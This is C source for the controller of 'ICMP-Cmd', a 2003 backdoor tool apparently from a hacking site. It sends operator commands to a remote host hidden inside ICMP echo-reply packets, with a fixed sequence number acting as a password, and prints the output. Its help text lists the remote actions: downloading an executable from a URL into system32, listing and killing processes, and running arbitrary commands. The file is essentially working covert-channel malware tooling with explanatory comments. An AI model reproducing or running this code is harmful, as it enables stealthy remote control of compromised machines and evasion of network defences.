  4 #pragma comment(lib,"ws2_32.lib")
  5 char SendMsg[256]; //command line typed by the operator; filled by fgets in main and copied whole into the ICMP payload by fill_icmp_data
  6 /* The IPv4 header (same layout as in Server.cpp); only h_len is used, to skip the variable-length IP header in decode_resp */
  7 typedef struct iphdr {
  8     unsigned int h_len:4; //4-bit header length, in 32-bit words
  9     unsigned int version:4; //4-bit IP version; 4 means IPv4
 10     unsigned char tos; //8-bit type of service
 11     unsigned short total_len; //16-bit total length in bytes
 12     unsigned short ident; //16-bit identification
 13     unsigned short frag_and_flags; //3 flag bits plus fragment offset
 14     unsigned char ttl; //8-bit time to live
 15     unsigned char proto; //8-bit protocol (TCP, UDP or other)
 16     unsigned short checksum; //16-bit IP header checksum
 17     unsigned int sourceIP; //32-bit source IP address
 18     unsigned int destIP; //32-bit destination IP address
 19 }IpHeader;
 20  
 21  
 22 typedef struct _ihdr //ICMP header, 12 bytes: the 8-byte echo header plus a 4-byte timestamp (decode_resp hard-codes the 12)
 23 {
 24     BYTE i_type;//8-bit type; this program only ever sends 0 (echo reply)
 25     BYTE i_code; //8-bit code
 26     USHORT i_cksum;//16-bit checksum over header plus payload
 27     USHORT i_id;//identifier (the process id is used)
 28     USHORT i_seq;//sequence number, used as the protocol marker: 1234 to the server, 4321 back from it
 29     ULONG timestamp;//tick count at send time
 30 } IcmpHeader;
 31 #define STATUS_FAILED 0xFFFF //process exit code on Winsock setup failure
 32  
 33 #define MAX_PACKET 2000 //size of the per-command send and receive buffers
 34 char arg[1450]; //payload text extracted from a server reply by decode_resp
 35 #define xmalloc(s) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (s)) //zero-filled heap allocation; never freed in this file
 36  
 37 void fill_icmp_data(char *, int); //writes the ICMP header (seq 1234) and copies SendMsg in as payload
 38 USHORT checksum(USHORT *, int); //RFC 1071 one's-complement checksum
 39 void decode_resp(char *,int ,struct sockaddr_in *); //prints the payload of a reply carrying seq 4321
 40 void help(void); //prints the command list
 41 void usage(char * prog); //prints the banner and usage line
 42 int main(int argc, char *argv[]) //interactive controller: reads one line at a time, sends it to argv[1] in an ICMP packet with seq 1234, then prints replies for about a second
 43 {
 44     char *ICMP_DEST_IP; //target host IP
 45     char *recvbuf;
 46     if(argc!=2)
 47     {
 48         usage(argv[0]);
 49         return 0;
 50     }
 51     ICMP_DEST_IP=argv[1]; //target host IP from the command line, passed straight to inet_addr
 52     WSADATA wsaData;
 53     SOCKET sockRaw;
 54     struct sockaddr_in dest,from;
 55     int datasize;
 56     int fromlen=sizeof(from);
 57     char *icmp_data;
 58  
 59  
 60     if(WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
 61     {
 62         fprintf(stderr, "WSAStartup failed: %d\n", GetLastError());
 63         ExitProcess(STATUS_FAILED);
 64     }
 65     sockRaw=socket(AF_INET, SOCK_RAW, IPPROTO_ICMP); //raw socket, administrative rights required; the result is not checked before use
 66     int timeout=1000;
 67     setsockopt(sockRaw, SOL_SOCKET, SO_SNDTIMEO, (char *) &timeout, sizeof(timeout)); //1 s send timeout, return value ignored
 68     timeout=4000;
 69     setsockopt(sockRaw, SOL_SOCKET, SO_RCVTIMEO, (char *) &timeout, sizeof(timeout)); //4 s receive timeout, return value ignored
 70     memset(&dest,0,sizeof(dest));
 71     dest.sin_addr.s_addr=inet_addr(ICMP_DEST_IP); //a malformed address (INADDR_NONE) is not detected
 72     dest.sin_family=AF_INET;
 73     usage(argv[0]);
 74     __try{
 75         for(;;){
 76             printf("ICMP-CMD>");
 77             fgets(SendMsg,1024,stdin); //size argument 1024 is larger than the 256-byte SendMsg, so a long line overruns the array; the newline is kept
 78             if(!strcmp(SendMsg,"Q\n")||!strcmp(SendMsg,"q\n"))ExitProcess(0); //skips the __finally cleanup
 79             if(!strcmp(SendMsg,"\n"))continue;
 80             if(!strcmp(SendMsg,"H\n")||!strcmp(SendMsg,"h\n")){help();continue;}
 81             if(!memcmp(SendMsg,"http://",7)) //only the inner if belongs to this condition; despite the indentation, everything from datasize= onward runs for every command
 82                 if(!strstr(SendMsg,"-")){
 83                     printf("\nFileName Error. Use ");
 84                     continue;
 85                 }
 86                 datasize=strlen(SendMsg); //typed text length...
 87                 datasize+=sizeof(IcmpHeader); //...plus the 12-byte header is what gets checksummed and sent
 88                 printf("ICMP packet size is %d",datasize);
 89                 icmp_data= (char*)xmalloc(MAX_PACKET); //fresh heap blocks on every command, never freed
 90                 recvbuf= (char *)xmalloc(MAX_PACKET);
 91                 memset(icmp_data,0, MAX_PACKET);
 92                 fill_icmp_data(icmp_data, datasize); //copies all 256 bytes of SendMsg, but only datasize bytes go on the wire
 93                 ((IcmpHeader *)icmp_data)->i_cksum=0;
 94                 ((IcmpHeader *)icmp_data)->i_cksum=checksum((USHORT *)icmp_data, datasize);
 95                 int bwrote=sendto(sockRaw, icmp_data, datasize, 0, (struct sockaddr *) &dest, sizeof(dest));
 96                 if (bwrote == SOCKET_ERROR)
 97                 {
 98                     if (WSAGetLastError() == WSAETIMEDOUT) printf("Timed out\n");
 99                     fprintf(stderr,"sendto failed: %d\n",WSAGetLastError());
100                 }
101                 if (bwrote<datasize ) { //also true after SOCKET_ERROR: a failed or short send ends the program (through __finally)
102                     return 0;
103                 }
104                 printf("\nSend Packet to %s Success!\n",argv[1]);
105                 DWORD start = GetTickCount();
106                 for(;;){ //gather replies for about one second; a single recvfrom can still block up to the 4 s timeout
107                     if((GetTickCount() - start) >= 1000) break;
108                     memset(recvbuf,0,MAX_PACKET); //zero fill so decode_resp's printf finds a terminator
109                     int bread=recvfrom(sockRaw, recvbuf, MAX_PACKET, 0, (struct sockaddr *) &from, &fromlen); //raw socket: any ICMP reaching this host arrives here
110                     if(bread == SOCKET_ERROR)
111                     {
112                         if(WSAGetLastError() == WSAETIMEDOUT)
113                         {
114                             printf("timed out\n");
115                             break;
116                         }
117                         fprintf(stderr, "recvfrom failed: %d\n", WSAGetLastError());
118                         break;
119                     }
120                     decode_resp(recvbuf, bread, &from);
121                 }
122         }//end for
123     }//end try
124  
125  
126     __finally
127     {
128         if (sockRaw != INVALID_SOCKET) closesocket(sockRaw);
129         WSACleanup();
130     }
131     return 0;
132 }
133  
USHORT checksum(USHORT *buffer, int size) //RFC 1071 one's-complement checksum of size bytes starting at buffer
{
    unsigned long total = 0;
    int remaining = size;

    while (remaining > 1) { // whole 16-bit words
        total += *buffer;
        buffer++;
        remaining -= sizeof(USHORT);
    }
    if (remaining != 0) { // odd trailing byte, zero-extended
        total += *(UCHAR *)buffer;
    }
    // carry folding: bring the high half down, then once more for the final carry
    total = (total >> 16) + (total & 0xffff);
    total = total + (total >> 16);
    return (USHORT)~total;
}
150 void fill_icmp_data(char *icmp_data, int datasize) //writes the outgoing header (type 0 = echo reply, seq 1234) and the whole SendMsg array after it; datasize is not used here
151 {
152     IcmpHeader *icmp_hdr;
153     char *datapart;
154     icmp_hdr= (IcmpHeader *)icmp_data;
155     icmp_hdr->i_type=0; //echo reply, so the command packet does not look like a ping request
156     icmp_hdr->i_code=0;
157     icmp_hdr->i_id=(USHORT)GetCurrentProcessId();
158     icmp_hdr->timestamp =GetTickCount();
159     icmp_hdr->i_seq=1234; //must equal the server's ICMP_PASSWORD
160     datapart=icmp_data + sizeof(IcmpHeader);
161     memcpy(datapart,SendMsg,sizeof(SendMsg)); //all 256 bytes, including whatever follows the NUL; the caller only sends datasize bytes
162 }
void usage(char * prog) //prints the banner and the one-line usage for executable name prog
{
    static const char *head[] = {
        "\t\t=====Welcome to www.hackerxfiles.net======\n",
        "\n",
        "\t\t---[ ICMP-Cmd v1.0 beta, by gxisone   ]---\n",
        "\t\t---[ E-mail:    gxisone@hotmail.com   ]---\n",
        "\t\t---[                      2003/8/15   ]---\n",
    };
    size_t k;
    for (k = 0; k < sizeof head / sizeof head[0]; k++) {
        fputs(head[k], stdout);
    }
    printf("\t\tusage: %s RemoteIP\n", prog);
    fputs("\t\tCtrl+C or Q/q to Quite        H/h for help\n", stdout);
}
173  
174  
175 void decode_resp(char *buf, int bytes,struct sockaddr_in *from) //prints a server reply: packets whose ICMP seq is 4321 are shown, anything else is reported as other traffic
176 {
177     memset(arg,0,sizeof(arg));
178     IpHeader *iphdr;
179     IcmpHeader *icmphdr;
180     unsigned short iphdrlen;
181     iphdr = (IpHeader *)buf; //raw socket: the IP header precedes the ICMP header
182     iphdrlen = iphdr->h_len * 4 ; //h_len counts 32-bit words
183     icmphdr = (IcmpHeader*)(buf + iphdrlen); //bytes is only printed, never used to bound these accesses
184     if(icmphdr->i_seq==4321) //reply marker set by the server's fill_icmp_data
185     {
186         printf("%d bytes from %s:",bytes, inet_ntoa(from->sin_addr));
187         printf(" IcmpType %d",icmphdr->i_type);
188         printf(" IcmpCode %d",icmphdr->i_code);
189         printf("\n");
190         memcpy(arg,buf+iphdrlen+12,1450); //fixed-size copy of the payload after the 12-byte header, whatever the real length
191         printf("%s",arg); //the memcpy overwrote the memset above entirely, so termination relies on the zero-filled recvbuf
192     }
193     else 
194         printf("Other ICMP Packets!\n"); //any ordinary ICMP arriving at this host lands here
195 }
void help(void) //prints the list of commands the server side understands
{
    static const char *lines[] = {
        "\n",
        "[http://127.0.0.1/hack.exe -admin.exe]  (Download Files. Parth is ////system32)\n",
        "[pslist]        (List the Process)\n",
        "[pskill ID]     (Kill the Process)\n",
        "Command         (run the command)\n",
        "\n",
    };
    size_t k;
    for (k = 0; k < sizeof lines / sizeof lines[0]; k++) {
        fputs(lines[k], stdout);
    }
}

 
